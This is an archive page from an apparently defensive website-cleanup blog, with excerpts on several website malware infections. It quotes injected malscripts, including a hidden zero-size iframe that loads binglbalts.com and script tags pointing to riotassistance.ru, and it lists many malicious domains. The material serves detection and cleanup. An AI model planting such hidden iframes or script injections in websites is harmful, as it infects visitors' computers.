-
Recent Posts
Recent Comments
Archives
Categories
Meta
Category Archives: Uncategorized
riotassistance.ru infections
We’ve been seeing more website infections with a malscript that looks like: (opening script tag) src=”hxxp:// riotassistance.ru /Website.js”>(closing script tag) Note: We’ve also seen this same this but with nuttypiano replacing riotassistance. Sometimes the last part: Website.js is something else: … Continue reading
toobarcom, mybar, adsnet infections
Over the past week or so, we’ve been fighting a new website infection. At first, it appeared to be infecting just one hosting provider, but as we investigated further, we found it was affecting websites on many hosting providers. I’m … Continue reading
Posted in Uncategorized
Tagged adsnet.biz, backdoor, edisonsnightclub.com, freead.name, ftp credentials, gaindirectory.org, hackers, hosting providers, ideacoreportal.com, infected website, karenegren.com, malicious code, malscript, myads.name, mybar.us, obfuscated, this.b=this.M, toolbarcom.org, var st, website infection
Leave a comment
Vancouvererrorsonfile infection
Over the past few days we’ve cleaned 312 infected websites all with the script: (spaces added so it doesn’t set an alarm with your anti-virus program). As of right now the following sites don’t recognize vancouvererrorsonfile.com as being malicious: Google … Continue reading
Nutcountry.ru and Parkperson.ru iframes
Over the past week we’ve been seeing a lot of infected websites that have an iframe that contains one of these two URLs: nutcountry.ru:8080/index.php parkperson.ru:8080/index.php A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another … Continue reading
Posted in Uncategorized
Tagged asprox, infected website, nemohuildiin.ru, nutcountry, parkperson, sql injection
1 Comment
osCommerce v2.2 Website Infections
During the past 10 days we started seeing a number of websites using osCommerce v2.2 being infected. The infection usually included some randomly named folder with a list of files in them. Some of the folder names we’ve seen include: … Continue reading
Posted in Uncategorized
Tagged infected, infection, malscript, nt002.cn, nt02.co.in, oscommerce, v2.2
4 Comments
Treasury .gov websites hacked
It was announced by AVG that the websites: bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript: <SCR IPT (space added)> function addCookie(name, value, hours) { var date = new Date(); … Continue reading
Posted in Uncategorized
Leave a comment
Attack of mailcheck.php and chat.pl
This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate. Quite often when scanning or cleaning infected websites, … Continue reading
Posted in Uncategorized
Tagged base64_decode, chat.pl, hackers, infected website, mailcheck.php, ob_start, security_update
Leave a comment
Blender type website infections
We’ve been seeing a lot of recent website infections that use highly obfuscated javascript code that decodes to a domain: yourblenderparts.ru:8080. Many other domains are used as well such as: superbblender.ru thesuperpager.ru superroadmap.ru supersupermall.ru theblendertv.ru theblendertutorial.ru excellentblender.ru thechocolateweb.ru whosaleonline.ru worldmusicmagazine.ru … Continue reading
Posted in Uncategorized
Tagged avattop.ru, buytheblender.ru, cobalttrueblue.ru, excellentblender.ru, forredtag.ru, greatwebradio.ru, homesaleplus.ru, hotnewgirl.ru, livesitedesign.ru, new Array(), new Date(), newusaguide.ru, newvillagefresh.ru, pokesack.ru, recentmexico.ru, retireterrify.ru, royalbling.ru, samuest.ru, sitemape.ru, snoreflash.ru, sugaryhome.ru, superbblender.ru, superroadmap.ru, supersupermall.ru, theblendertutorial.ru, theblendertv.ru, thelaceweb.ru, thesuperexchange.ru, thesuperpager.ru, webdesktopnet.ru, webnetenglish.ru, worldmusicmagazine.ru, yoursuperpool.ru
Leave a comment
The recent "Movie Review" infections
Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies! The typical infection is a five letter .php file … Continue reading
Posted in Uncategorized
Tagged 3 10 To Yuma Soundtrack, acm awards, amanda peterson, bernadette protti, dan henderson, dazed and confused cast, death of a cheerleader, farley granger, freshman fall imdb, jake shields, josh selby, kelly pavlik, kesha snl, king mo, knights templar, luci baines johnson pictures, mark kerr, pavlik, psn code generator, roma airport, sabres hockey, sergio martinez, strangers on a train movie, strike force nashville presale code, strike force results hershel walker, strikeforce, tao las vegas, tea leoni, the good shepherd, the hitcher movie, this site may harm your computer, tx lottery pick 3, unemployment, warning this site may harm your computer
2 Comments
Attack of the binglbalts
We started seeing a lot of websites infected with a malscript that looks like: iframe frameborder=”0″ onload=’ if (!this.src) { this.src=”http://binglbalts.com/grep/”; this.height=0; this.width=0; } ‘>/iframe In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, … Continue reading